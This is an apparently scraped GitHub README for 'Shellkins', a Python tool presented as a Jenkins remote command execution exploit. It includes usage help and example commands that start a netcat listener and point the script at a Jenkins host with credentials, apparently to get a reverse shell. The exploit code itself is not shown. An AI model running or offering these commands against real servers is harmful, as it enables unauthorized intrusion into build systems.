xiosec / Shellkins

jenkins remote code execution

Repository from Github https://github.comxiosec/ShellkinsRepository from Github https://github.comxiosec/Shellkins

Shellkins

xiosec - Shellkins stars - Shellkins forks - Shellkins GitHub release License issues - Shellkins

Jenkins Remote Command Execution

Jenkins is an open source automation server. It helps automate the parts of software development related to building, testing, and deploying, facilitating continuous integration and continuous delivery.

Usage

$ python3 shellkins.py --help
usage: shellkins.py [-h] [--host HOST] [-u USER] [-p PASS] [--lhost LHOST] [--lport LPORT]

Jenkins Remote Command Execution
github : https://github.com/xiosec/Shellkins
by xiosec

optional arguments:
  -h, --help            show this help message and exit
  --host HOST           jenkins host address
  -u USER, --user USER  jenkins account username
  -p PASS, --pass PASS  jenkins account password
  --lhost LHOST         local listener address
  --lport LPORT         local listener port

Example

Clone this repository

$ git clone https://github.com/xiosec/Shellkins.git

Run a listener (on your machine)

$ nc -nlvp 1234

Run the script

$ python3 shellkins.py --host http://example.com:8080/ --user admin --pass admin --lhost 127.0.0.1 --lport 1234

License

Released under MIT by @xiosec.

About

jenkins remote code execution

License:MIT License


Languages

Language:Python 100.0%